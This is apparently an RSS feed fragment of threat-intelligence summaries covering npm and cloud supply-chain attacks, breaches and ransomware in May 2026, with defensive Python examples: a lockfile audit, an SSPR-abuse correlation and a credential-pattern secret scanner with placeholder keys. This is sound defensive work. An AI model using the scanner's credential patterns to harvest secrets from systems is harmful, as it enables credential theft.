&lt;p&gt;A supply chain attack via the npm ecosystem targeted the AntV data visualization library. Over 300 malicious package versions were published across 323 packages after a maintainer account was compromised. This is part of the ongoing Mini Shai-Hulud worm campaign, which aims to distribute malware via trusted packages. The attack highlights the risk of compromised credentials in open-source ecosystems. Immediate actions include auditing npm dependencies for affected packages, rotating credentials, and implementing multi-factor authentication. The impact is widespread, potentially affecting any project using the compromised packages. Organizations should review their software supply chain and monitor for unusual activity.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;This attack compromises the software supply chain by injecting malicious code into widely-used npm packages, potentially affecting numerous downstream users and leading to data theft or further compromise.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Immediately audit your dependencies for any AntV-ecosystem package versions published after the compromise date, rotate any npm tokens or account credentials that could have been exposed, and enable multi-factor authentication on every publishing account.&lt;/p&gt;
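&lt;p&gt;Added example (not Snyk or npm code) serving both this item and the echarts-for-react item above: an audit of a lockfileVersion 2/3 package-lock.json that lists the @antv-scoped packages and echarts-for-react it resolves, flags any version published after a cutoff, and also reports entries with no integrity hash or resolved outside the public registry. The lockfile fragment, the versions and the publish times are constructed (real publish times come from npm view PKG time --json), and the cutoff date is an assumption rather than a date from the reports.&lt;/p&gt;

```python
from datetime import datetime

# Added example, not from the reports. Walks a lockfileVersion 2/3
# package-lock.json (the "packages" map keyed by install path), picks out the
# packages under watch, and flags versions whose registry publish time is after
# a cutoff. Publish times are what "npm view PKG time --json" returns; here
# they are constructed so the check runs offline. CUTOFF is an assumption.
WATCHED_SCOPES = ("@antv/",)
WATCHED_NAMES = {"echarts-for-react"}
CUTOFF = datetime(2026, 5, 16, 0, 0, 0)


def package_name(install_path):
    """'node_modules/foo/node_modules/@antv/g2' becomes '@antv/g2'."""
    return install_path.split("node_modules/")[-1]


def is_watched(name):
    return name in WATCHED_NAMES or name.startswith(WATCHED_SCOPES)


def audit_lockfile(lock, publish_times, cutoff=CUTOFF):
    """Return (name, version, reasons) for each watched package needing review."""
    findings = []
    for install_path, entry in lock.get("packages", {}).items():
        if install_path == "":
            continue  # the root project entry
        name = package_name(install_path)
        if not is_watched(name):
            continue
        version = entry.get("version", "")
        reasons = []
        published = publish_times.get(name, {}).get(version)
        if published is None:
            reasons.append("no registry publish time on record for this version")
        elif datetime.strptime(published, "%Y-%m-%dT%H:%M:%SZ") > cutoff:
            reasons.append("published after the cutoff: " + published)
        if not entry.get("integrity"):
            reasons.append("lock entry carries no integrity hash")
        resolved = entry.get("resolved", "")
        if not resolved.startswith("https://registry.npmjs.org/"):
            reasons.append("resolved outside the public registry: " + resolved)
        if reasons:
            findings.append((name, version, reasons))
    return findings


# Constructed lockfile fragment and publish times; versions are placeholders.
SAMPLE_LOCK = {
    "name": "dashboard",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "dashboard", "version": "1.0.0"},
        "node_modules/@antv/g2": {
            "version": "9.9.9",
            "resolved": "https://registry.npmjs.org/@antv/g2/-/g2-9.9.9.tgz",
            "integrity": "sha512-AAAA",
        },
        "node_modules/echarts-for-react": {
            "version": "8.8.8",
            "resolved": "https://registry.npmjs.org/echarts-for-react/-/echarts-for-react-8.8.8.tgz",
            "integrity": "sha512-BBBB",
        },
        "node_modules/left-pad": {
            "version": "1.3.0",
            "resolved": "https://registry.npmjs.org/left-pad/-/left-pad-1.3.0.tgz",
            "integrity": "sha512-CCCC",
        },
    },
}
SAMPLE_PUBLISH_TIMES = {
    "@antv/g2": {"9.9.8": "2026-03-01T10:00:00Z", "9.9.9": "2026-05-17T03:12:45Z"},
    "echarts-for-react": {"8.8.8": "2025-11-20T08:00:00Z"},
}


def audit_sample_lockfile():
    return audit_lockfile(SAMPLE_LOCK, SAMPLE_PUBLISH_TIMES)


if __name__ == "__main__":
    for name, version, reasons in audit_sample_lockfile():
        print(name, version, reasons)
```

&lt;p&gt;The publish-time check is the one that matters for a hijacked maintainer account: the package name and the registry are exactly what they were before, so only when the version appeared tells you whether it came from the attacker. Nested copies under a second node_modules segment are handled by taking the last segment of the install path.&lt;/p&gt;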
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Malware, High Severity, Supply Chain Compromise, Trojan&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Snyk Blog | &lt;a href=&quot;https://snyk.io/blog/mini-shai-hulud-antv-npm-supply-chain-attack/&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Mon, 18 May 2026 23:00:00 GMT</pubDate>
      <source url="https://snyk.io/blog/mini-shai-hulud-antv-npm-supply-chain-attack/">Snyk Blog</source>
      <category>Malware</category>
      <category>Supply Chain Compromise</category>
      <category>Trojan</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>How Storm-2949 turned a compromised identity into a cloud-wide breach</title>
      <link>https://brewedintel.io/articles/271b036a-367d-44fd-9139-1113951fd7b1</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/271b036a-367d-44fd-9139-1113951fd7b1</guid>
      <description>Storm-2949 executed a sophisticated cloud breach by compromising identities through social engineering and Self-Service Password Reset (SSPR) abuse, bypassing MFA and gaining persistent access. They moved laterally across Microsoft 365 and Azure environments, exfiltrating sensitive data from M365 apps, Azure Storage, SQL databases, and Key Vaults using legitimate administrative features without malware, employing ScreenConnect for remote access and defense evasion. This incident underscores the critical risk of identity compromise in cloud environments. Microsoft recommends robust identity protections, conditional access, and behavior-based detection to mitigate such threats.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;Storm-2949 executed a sophisticated cloud breach by compromising identities through social engineering and Self-Service Password Reset (SSPR) abuse, bypassing MFA and gaining persistent access. They moved laterally across Microsoft 365 and Azure environments, exfiltrating sensitive data from M365 apps, Azure Storage, SQL databases, and Key Vaults using legitimate administrative features without malware, employing ScreenConnect for remote access and defense evasion. This incident underscores the critical risk of identity compromise in cloud environments. Microsoft recommends robust identity protections, conditional access, and behavior-based detection to mitigate such threats.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;This attack shows that a single compromised identity can lead to a full cloud-wide breach and massive data exfiltration without malware, highlighting the need for comprehensive identity protection and visibility across cloud layers.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Enforce multifactor authentication with number matching, monitor SSPR abuse, implement conditional access policies, use behavior-based detection tools like Microsoft Defender for Cloud Apps and Defender for Identity, and apply least-privilege access for cloud resources.&lt;/p&gt;
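&lt;p&gt;Added example (not Microsoft code): a correlation over exported Entra audit events that raises a user for review when a self-service password reset is followed within a short window by a new security-info registration, which is the shape of the SSPR abuse this report describes. The activity names are assumed to match the audit log wording and should be adjusted to your export; the two-hour window is an assumption and the events are constructed.&lt;/p&gt;

```python
from datetime import datetime, timedelta

# Added example, not Microsoft code. Correlates Entra audit events so that a
# self-service password reset followed shortly by a new security-info
# registration for the same user is raised for review. Activity names are
# assumed to match the audit log wording; adjust them to your export.
WINDOW = timedelta(hours=2)  # assumption: how close the two events must be
RESET = "Reset password (self-service)"
REGISTERED = "User registered security info"


def parse_ts(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def find_sspr_chains(events, window=WINDOW):
    """Return (user, reset time, registration time, ip) for each suspicious chain."""
    ordered = sorted(events, key=lambda e: parse_ts(e["ts"]))
    chains = []
    for i, event in enumerate(ordered):
        if event["activity"] != RESET:
            continue
        reset_at = parse_ts(event["ts"])
        for later in ordered[i + 1:]:
            if later["user"] != event["user"] or later["activity"] != REGISTERED:
                continue
            gap = parse_ts(later["ts"]) - reset_at
            if window >= gap:
                chains.append((event["user"], event["ts"], later["ts"], later["ip"]))
            break  # only the first registration after the reset matters
    return chains


# Constructed sample events, deliberately out of order to exercise the sort.
SAMPLE_AUDIT = [
    {"ts": "2026-05-14T09:05:00Z", "user": "j.doe@example.com", "activity": REGISTERED, "ip": "203.0.113.10"},
    {"ts": "2026-05-14T09:02:00Z", "user": "j.doe@example.com", "activity": RESET, "ip": "203.0.113.10"},
    {"ts": "2026-05-14T11:00:00Z", "user": "a.smith@example.com", "activity": RESET, "ip": "198.51.100.7"},
    {"ts": "2026-05-15T08:00:00Z", "user": "a.smith@example.com", "activity": REGISTERED, "ip": "198.51.100.7"},
    {"ts": "2026-05-14T12:00:00Z", "user": "k.lee@example.com", "activity": REGISTERED, "ip": "192.0.2.5"},
]

if __name__ == "__main__":
    for chain in find_sspr_chains(SAMPLE_AUDIT):
        print(chain)
```

&lt;p&gt;A registration the day after a reset (a.smith above) is normal helpdesk traffic and is left alone; a reset and a new authentication method minutes apart from the same address (j.doe) is the pattern worth a conditional access block and a phone call, because a password reset by itself never proves the person on the other end owns the account.&lt;/p&gt;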
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Malware, Critical Severity, Cloud Compromise, Credential Access, Data Exfiltration&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Microsoft Security Blog | &lt;a href=&quot;https://www.microsoft.com/en-us/security/blog/2026/05/18/storm-2949-turned-compromised-identity-into-cloud-wide-breach/&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Mon, 18 May 2026 22:42:50 GMT</pubDate>
      <dc:creator>Microsoft Defender Security Research Team</dc:creator>
      <source url="https://www.microsoft.com/en-us/security/blog/2026/05/18/storm-2949-turned-compromised-identity-into-cloud-wide-breach/">Microsoft Security Blog</source>
      <category>Malware</category>
      <category>Cloud Compromise</category>
      <category>Credential Access</category>
      <category>Data Exfiltration</category>
      <category>Social Engineering</category>
      <category>Critical Severity</category>
    </item>
    <item>
      <title>TeamPCP Supply Chain Campaign: Activity Through 2026-05-17, (Mon, May 18th)</title>
      <link>https://brewedintel.io/articles/ed9746de-175f-4aed-8783-6b3a8f0be595</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/ed9746de-175f-4aed-8783-6b3a8f0be595</guid>
      <description>The TeamPCP supply chain campaign has escalated with two major developments: an officially confirmed compromise of the Checkmarx Jenkins plugin and a new self-spreading worm named Mini Shai-Hulud distributed via npm and PyPI. These threats target software supply chains, potentially affecting many downstream users. Organizations should review their use of affected components and bolster software supply chain defenses.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;The TeamPCP supply chain campaign has escalated with two major developments: an officially confirmed compromise of the Checkmarx Jenkins plugin and a new self-spreading worm named Mini Shai-Hulud distributed via npm and PyPI. These threats target software supply chains, potentially affecting many downstream users. Organizations should review their use of affected components and bolster software supply chain defenses.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;Supply chain attacks can compromise trusted software dependencies, enabling widespread initial access and lateral movement across multiple targets.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Implement software bill of materials (SBOM) practices, monitor for suspicious updates to plugins and packages, and enforce code signing and integrity verification.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Adversary, High Severity, Supply Chain Attack, Worm&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: SANS Internet Storm Center | &lt;a href=&quot;https://isc.sans.edu/diary/rss/32994&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Mon, 18 May 2026 20:08:00 GMT</pubDate>
      <source url="https://isc.sans.edu/diary/rss/32994">SANS Internet Storm Center</source>
      <category>Adversary</category>
      <category>Supply Chain Attack</category>
      <category>Worm</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>Grafana confirms GitHub token breach, cybercrime group claims the attack</title>
      <link>https://brewedintel.io/articles/ea1c4c85-67a6-476f-af77-838a98f49e8d</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/ea1c4c85-67a6-476f-af77-838a98f49e8d</guid>
      <description>Grafana Labs confirmed a security incident after the extortion group Coinbase Cartel listed it on a leak site, claiming data theft. The breach was caused by a compromised GitHub token that exposed source code repositories. Grafana stated that no customer data or systems were affected. The company revoked credentials and is conducting a forensic investigation. While no customer impact was reported, stolen source code poses risks including vulnerability analysis and supply chain attacks. The incident highlights the critical need for robust token security, short-lived tokens, strict scoping, and phishing-resistant MFA to protect development environments.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;Grafana Labs confirmed a security incident after the extortion group Coinbase Cartel listed it on a leak site, claiming data theft. The breach was caused by a compromised GitHub token that exposed source code repositories. Grafana stated that no customer data or systems were affected. The company revoked credentials and is conducting a forensic investigation. While no customer impact was reported, stolen source code poses risks including vulnerability analysis and supply chain attacks. The incident highlights the critical need for robust token security, short-lived tokens, strict scoping, and phishing-resistant MFA to protect development environments.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Other, Medium Severity, Data Theft, Extortion&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Security Affairs (Data Breach) | &lt;a href=&quot;https://securityaffairs.com/192347/breaking-news/grafana-confirms-github-token-breach-cybercrime-group-claims-the-attack.html&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Mon, 18 May 2026 18:54:22 GMT</pubDate>
      <dc:creator>Pierluigi Paganini</dc:creator>
      <source url="https://securityaffairs.com/192347/breaking-news/grafana-confirms-github-token-breach-cybercrime-group-claims-the-attack.html">Security Affairs (Data Breach)</source>
      <category>Other</category>
      <category>Data Theft</category>
      <category>Extortion</category>
      <category>Medium Severity</category>
    </item>
    <item>
      <title>18th May – Threat Intelligence Report</title>
      <link>https://brewedintel.io/articles/6477a976-6811-43fb-9122-08aebee70be5</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/6477a976-6811-43fb-9122-08aebee70be5</guid>
      <description>This week&#x27;s threat intelligence report covers multiple critical incidents: ransomware attacks on West Pharmaceutical and Foxconn (claimed by Nitrogen), a source code leak at Vodafone allegedly by Lapsus$, and a $10.7M theft from THORChain. Critical vulnerabilities include YellowKey and GreenPlasma in Windows, CVE-2026-42945 in NGINX, CVE-2026-20182 in Cisco Catalyst SD-WAN (actively exploited), and CVE-2026-28819 in Apple products. AI threats involve Claw Chain vulnerabilities in OpenClaw, an AI-assisted macOS kernel exploit bypassing M5 security, and mass-produced phishing pages via Vercel&#x27;s v0.dev. A Hugging Face repository disguised as OpenAI&#x27;s privacy filter infected over 200,000 downloads with an infostealer. Check Point Research also analyzed an internal leak from The Gentlemen ransomware operation and reported Q1 2026 ransomware trends showing 2,122 leak-site victims, with Qilin leading. Organizations should prioritize patching, monitor for AI-driven phishing, and deploy advanced threat detection.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;This week&amp;#x27;s threat intelligence report covers multiple critical incidents: ransomware attacks on West Pharmaceutical and Foxconn (claimed by Nitrogen), a source code leak at Vodafone allegedly by Lapsus$, and a $10.7M theft from THORChain. Critical vulnerabilities include YellowKey and GreenPlasma in Windows, CVE-2026-42945 in NGINX, CVE-2026-20182 in Cisco Catalyst SD-WAN (actively exploited), and CVE-2026-28819 in Apple products. AI threats involve Claw Chain vulnerabilities in OpenClaw, an AI-assisted macOS kernel exploit bypassing M5 security, and mass-produced phishing pages via Vercel&amp;#x27;s v0.dev. A Hugging Face repository disguised as OpenAI&amp;#x27;s privacy filter infected over 200,000 downloads with an infostealer. Check Point Research also analyzed an internal leak from The Gentlemen ransomware operation and reported Q1 2026 ransomware trends showing 2,122 leak-site victims, with Qilin leading. Organizations should prioritize patching, monitor for AI-driven phishing, and deploy advanced threat detection.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;Organizations face immediate risk from actively exploited vulnerabilities and from ransomware operations hitting large manufacturers and their suppliers; unpatched systems can lead to data breaches and operational disruption.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Prioritize patching of the critical CVEs (CVE-2026-44112, CVE-2026-42945 and CVE-2026-28819, and first of all the actively exploited CVE-2026-20182), layer compensating controls such as network segmentation and endpoint detection where patches lag, and train users to recognise phishing pages built from AI-generated content.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Vulnerability, Critical Severity, Phishing, Ransomware, Vulnerability Exploitation&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Check Point Research | &lt;a href=&quot;https://research.checkpoint.com/2026/18th-may-threat-intelligence-report/&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Mon, 18 May 2026 14:58:29 GMT</pubDate>
      <dc:creator>urias</dc:creator>
      <source url="https://research.checkpoint.com/2026/18th-may-threat-intelligence-report/">Check Point Research</source>
      <category>Vulnerability</category>
      <category>Phishing</category>
      <category>Ransomware</category>
      <category>Vulnerability Exploitation</category>
      <category>Critical Severity</category>
    </item>
    <item>
      <title>ShinyHunters hack 7-Eleven: franchisee data and Salesforce records exposed</title>
      <link>https://brewedintel.io/articles/cafa4808-f1fe-4855-949f-a450db1eb5b2</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/cafa4808-f1fe-4855-949f-a450db1eb5b2</guid>
      <description>ShinyHunters breached 7-Eleven, stealing over 600,000 Salesforce records containing PII and corporate data. The group threatened to publish the data if a ransom was not paid by April 21. 7-Eleven confirmed the incident, noting unauthorized access to systems storing franchisee documents on April 8, 2026. The breach exposes sensitive franchise applicant information, and the full impact is still under investigation. ShinyHunters has previously targeted major organizations, often focusing on Salesforce instances.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;ShinyHunters breached 7-Eleven, stealing over 600,000 Salesforce records containing PII and corporate data. The group threatened to publish the data if a ransom was not paid by April 21. 7-Eleven confirmed the incident, noting unauthorized access to systems storing franchisee documents on April 8, 2026. The breach exposes sensitive franchise applicant information, and the full impact is still under investigation. ShinyHunters has previously targeted major organizations, often focusing on Salesforce instances.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;ShinyHunters is actively targeting Salesforce instances, and this breach demonstrates the risk of exposing sensitive franchisee data, which can lead to financial and reputational damage.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Secure Salesforce instances with least-privilege profiles and permission sets, restrict which connected apps users may authorize, enable multi-factor authentication, monitor for bulk record exports and other anomalous activity, and ensure incident response plans cover data-theft extortion.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Malware, High Severity, Data Breach, Extortion&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Security Affairs (Data Breach) | &lt;a href=&quot;https://securityaffairs.com/192336/data-breach/shinyhunters-hack-7-eleven-franchisee-data-and-salesforce-records-exposed.html&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Mon, 18 May 2026 13:48:01 GMT</pubDate>
      <dc:creator>Pierluigi Paganini</dc:creator>
      <source url="https://securityaffairs.com/192336/data-breach/shinyhunters-hack-7-eleven-franchisee-data-and-salesforce-records-exposed.html">Security Affairs (Data Breach)</source>
      <category>Malware</category>
      <category>Data Breach</category>
      <category>Extortion</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>IT threat evolution in Q1 2026. Non-mobile statistics</title>
      <link>https://brewedintel.io/articles/a42db58e-8a9b-4e28-9bf1-dd8a87b14e47</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/a42db58e-8a9b-4e28-9bf1-dd8a87b14e47</guid>
      <description>In Q1 2026, ransomware activity remained high: Kaspersky blocked over 343 million attacks and detected nearly 3,000 new ransomware variants. Law enforcement achieved notable successes, including the seizure of the RAMP cybercrime forum domains and arrests linked to the Phobos and BlackCat groups. A zero-day vulnerability in Cisco Secure FMC (CVE-2026-20131) was heavily exploited by the Interlock group for initial access. Clop led the data-leak-site victim counts, followed by Qilin and the emerging group The Gentlemen. The quarter saw 77,319 unique users attacked, with activity peaking in March. Key mitigations include patching critical vulnerabilities, network segmentation, and maintaining offline backups. The threat landscape underscores the need for proactive defense against evolving ransomware operations.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;In Q1 2026, ransomware activity remained high: Kaspersky blocked over 343 million attacks and detected nearly 3,000 new ransomware variants. Law enforcement achieved notable successes, including the seizure of the RAMP cybercrime forum domains and arrests linked to the Phobos and BlackCat groups. A zero-day vulnerability in Cisco Secure FMC (CVE-2026-20131) was heavily exploited by the Interlock group for initial access. Clop led the data-leak-site victim counts, followed by Qilin and the emerging group The Gentlemen. The quarter saw 77,319 unique users attacked, with activity peaking in March. Key mitigations include patching critical vulnerabilities, network segmentation, and maintaining offline backups. The threat landscape underscores the need for proactive defense against evolving ransomware operations.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;Ransomware groups are actively exploiting zero-day vulnerabilities in network appliances and leveraging data leak sites for extortion, posing a direct threat to organizational data and operations.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Immediately patch CVE-2026-20131 in Cisco Secure FMC, implement strict access controls, and ensure comprehensive backup and incident response plans are in place to mitigate ransomware impact.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Malware, High Severity, Ransomware&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Kaspersky Securelist | &lt;a href=&quot;https://securelist.com/malware-report-q1-2026-pc-iot-statistics/119828/&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Mon, 18 May 2026 12:00:22 GMT</pubDate>
      <dc:creator>AMR</dc:creator>
      <source url="https://securelist.com/malware-report-q1-2026-pc-iot-statistics/119828/">Kaspersky Securelist</source>
      <category>Malware</category>
      <category>Ransomware</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>7-Eleven Data Breach Confirmed After ShinyHunters Ransom Demand</title>
      <link>https://brewedintel.io/articles/12199529-848e-4a3e-8a4c-63b5e7593a39</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/12199529-848e-4a3e-8a4c-63b5e7593a39</guid>
      <description>The convenience store chain 7-Eleven confirmed a data breach after the threat actor group ShinyHunters demanded a ransom. The hackers claim to have stolen over 600,000 Salesforce records containing personal and corporate data. The breach underscores the risk of third-party data stores and the growing trend of extortion-driven attacks. Organizations should prioritize securing cloud-based CRM platforms and implement robust access controls and monitoring. The incident highlights the need for rapid incident response and proactive threat hunting to detect data exfiltration early and limit the extortion that follows it.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;The convenience store chain 7-Eleven confirmed a data breach after the threat actor group ShinyHunters demanded a ransom. The hackers claim to have stolen over 600,000 Salesforce records containing personal and corporate data. The breach underscores the risk of third-party data stores and the growing trend of extortion-driven attacks. Organizations should prioritize securing cloud-based CRM platforms and implement robust access controls and monitoring. The incident highlights the need for rapid incident response and proactive threat hunting to detect data exfiltration early and limit the extortion that follows it.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;This breach demonstrates that even large enterprises are vulnerable to data exfiltration via compromised cloud services, potentially exposing sensitive customer and corporate information to extortion.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Immediately audit third-party data stores such as Salesforce for unusual access patterns and bulk exports, enforce multi-factor authentication, and prepare an incident response plan for data-theft extortion; backups restore availability but do not reduce the impact of data that has already been stolen.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Malware, High Severity, Data Theft, Ransomware&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: SecurityWeek | &lt;a href=&quot;https://www.securityweek.com/7-eleven-data-breach-confirmed-after-shinyhunters-ransom-demand/&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Mon, 18 May 2026 11:25:54 GMT</pubDate>
      <dc:creator>Eduard Kovacs</dc:creator>
      <source url="https://www.securityweek.com/7-eleven-data-breach-confirmed-after-shinyhunters-ransom-demand/">SecurityWeek</source>
      <category>Malware</category>
      <category>Data Theft</category>
      <category>Ransomware</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>Developer Workstations Are Now Part of the Software Supply Chain</title>
      <link>https://brewedintel.io/articles/3e049e51-a9f0-43ac-b038-3bae8ef6139c</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/3e049e51-a9f0-43ac-b038-3bae8ef6139c</guid>
      <description>The article highlights a growing trend in software supply chain attacks where adversaries target developer environments and CI/CD pipelines to steal secrets such as API keys, cloud credentials, SSH keys, and tokens. Three coordinated campaigns against npm, PyPI, and Docker Hub within 48 hours exemplify this shift. Instead of injecting malicious code, attackers aim to compromise the access that underpins trusted software, potentially enabling broader infiltration of downstream systems. This emphasizes the need for robust secret management and security controls in development workflows.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;The article highlights a growing trend in software supply chain attacks where adversaries target developer environments and CI/CD pipelines to steal secrets such as API keys, cloud credentials, SSH keys, and tokens. Three coordinated campaigns against npm, PyPI, and Docker Hub within 48 hours exemplify this shift. Instead of injecting malicious code, attackers aim to compromise the access that underpins trusted software, potentially enabling broader infiltration of downstream systems. This emphasizes the need for robust secret management and security controls in development workflows.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;Attackers are increasingly targeting developer credentials and CI/CD secrets to gain privileged access to your software supply chain, potentially compromising every product you release.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Implement strict secret scanning and rotation policies, enforce multi-factor authentication for CI/CD access, and monitor developer environments for unusual activity or unauthorized token usage.&lt;/p&gt;
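&lt;p&gt;As an added example (not code from The Hacker News article or from any product it mentions), the scanner below shows the secret-scanning step in working form: it checks text for well-known credential prefixes and falls back to a keyword-plus-entropy heuristic for anything else that looks like an assigned secret, which is what catches the long random values that have no recognisable prefix. The sample files, the 3.5 bits-per-character threshold and the placeholder token values are constructed for this example; the two AWS values are the placeholders AWS publishes in its own documentation.&lt;/p&gt;

```python
"""Secret scanner for developer workstations and CI configs.

Added example, not from the article. SAMPLE_FILES and the thresholds are
constructed for illustration; the AWS values are AWS documentation placeholders.
"""
import math
import re
from dataclasses import dataclass

# Credential formats with fixed prefixes: near-zero false positives, so they are
# reported without any further checks.
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    "github_token": re.compile(r"\bgh[pousr]_[A-Za-z0-9]{36}\b"),
    "npm_token": re.compile(r"\bnpm_[A-Za-z0-9]{36}\b"),
    "private_key_block": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
}

# Generic fallback: NAME=value or name: "value" where the name suggests a secret.
# The value must then pass an entropy check to weed out placeholders.
ASSIGNMENT = re.compile(
    r"(?i)\b([a-z0-9_.-]*(?:secret|token|password|passwd|api[_-]?key)[a-z0-9_.-]*)"
    r"\s*[=:]\s*['\"]?([^\s'\"]{16,})"
)
ENTROPY_THRESHOLD = 3.5  # bits per character (assumption); random tokens score higher


@dataclass(frozen=True)
class Finding:
    path: str
    line_no: int
    kind: str
    redacted: str


def shannon_entropy(s: str) -> float:
    """Average bits per character; random base64-ish tokens score well above 3.5."""
    if not s:
        return 0.0
    n = len(s)
    return -sum((s.count(c) / n) * math.log2(s.count(c) / n) for c in set(s))


def redact(value: str) -> str:
    """Keep a short prefix so a report can identify the secret without re-leaking it."""
    return value[:6] + "..." if len(value) > 6 else "***"


def scan_text(path: str, text: str) -> list[Finding]:
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        matched_named = False
        for kind, pattern in SECRET_PATTERNS.items():
            for m in pattern.finditer(line):
                findings.append(Finding(path, line_no, kind, redact(m.group(0))))
                matched_named = True
        if matched_named:
            continue  # do not report the same token twice via the generic rule
        m = ASSIGNMENT.search(line)
        if m and shannon_entropy(m.group(2)) > ENTROPY_THRESHOLD:
            findings.append(Finding(path, line_no, "high_entropy_assignment", redact(m.group(2))))
    return findings


def scan_files(files: dict[str, str]) -> list[Finding]:
    return [f for path, text in files.items() for f in scan_text(path, text)]


# Constructed sample files. Only .env lines 2 and 3 and the NPM_TOKEN line should
# be reported; API_KEY is a placeholder with zero entropy and must not be flagged.
SAMPLE_FILES = {
    ".env": (
        "DB_HOST=localhost\n"
        "AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE\n"
        "AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\n"
        "API_KEY=aaaaaaaaaaaaaaaaaaaa\n"
    ),
    ".github/workflows/ci.yml": (
        "env:\n"
        "  NPM_TOKEN: npm_0123456789abcdefghijklmnopqrstuv0123\n"
        "  LOG_LEVEL: debug\n"
    ),
    "notes.txt": "password: changeme\nsee README for setup\n",
}

if __name__ == "__main__":
    for f in scan_files(SAMPLE_FILES):
        print(f"{f.path}:{f.line_no} {f.kind} {f.redacted}")
```

&lt;p&gt;Run it as a pre-commit hook over staged files and as a one-off over shell history, editor state and CI definitions; the entropy threshold is the knob to tune, since a value too low floods the report with URLs and hashes while a value too high misses short hex secrets.&lt;/p&gt;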
